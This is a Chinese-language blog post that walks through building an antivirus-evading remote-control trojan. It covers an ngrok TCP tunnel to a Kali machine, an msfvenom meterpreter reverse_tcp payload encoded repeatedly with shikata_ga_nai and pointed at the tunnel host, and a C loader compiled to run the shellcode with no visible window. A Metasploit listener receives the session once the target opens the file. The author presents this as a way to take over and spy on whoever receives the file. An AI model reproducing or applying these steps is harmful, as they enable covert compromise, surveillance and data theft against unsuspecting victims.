任意外网远控

作者:老猫 分类: 信息安全 发布于:2018-4-6 12:34 ė518次浏览 60条评论

文凭不行,就简谈一下得了

首先,咋们知道,我发了一个文件给你你就被我控制了。

我可以拍照摄像下载文件,并且可以随时监控你。而且杀毒也不会拦截我,这是怎么做到的呢?

那么今天我给大家说一下原理吧!

首先我制作免杀payload,

我们需要下载一个用于内网穿透的工具来进行端口映射与转发

我用的是linux64bit。

我们去注册申请一下-----------申请地址https://www.ngrok.cc/#down-client

申请下登录,然后申请免费隧道,选择TCP协议,自定义远程端口,本地IP地址就是kali的IP地址,端口自定义。

完成后他会说明申请完成,在什么时候释放隧道等等信息。

然后你记住隧道id,以及自定义远程端口,kali本机端口
将下载的客户端放置于指定目录,cd到目录,在命令行运行ngrok

这样就完成了端口映射,它能将外网端口接收到的数据返回到本机kali的指定端口。


制作木马后门

我们先在kali中用msfvenom生成一个payload

代码如下:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’lhost=server.ngrok.cc lport=11206 -f c

上面命令中,-p选择指定payload,–e选择制定编码器(不同编码器免杀效果也有不同,部分编码器应对火绒等杀软效果显著), -i 编码次数,-b 去多余/坏字符,lhost是你申请的ngrok服务器地址 lport是自定义的远程端口,-f 生成指定格式。

然后复制buf数组

接着在win7下用VC6.0对下面代码进行编译,得到木马。

#include <stdio.h>
#pragmacomment( linker, "/subsystem:"windows" /entry:"mainCRTStartup"")//运行时不显示窗口
unsignedchar buf[] =
"buf数组";//将复制的数组粘贴到此处
main()
{
((void(*)(void))&buf)();
}
得后,切到Kali,使用Metasploit进行监听。

设置监听攻击模块,监听载荷,IP(kali本机),端口(ngrok里自定义的本地端口),然后exp。

当客户机执行木马后,得到一个meterpreter,就可以操作了。。


OK,解说就到这里了。

本人退网了,仅限在本博客发一些文章而已

QQ:2189190137

安稳随性一生.


本文出自 MA2安全网,转载时请注明出处及相应链接。

0

发表评论

电子邮件地址不会被公开。必填项已用*标注


Ɣ回顶部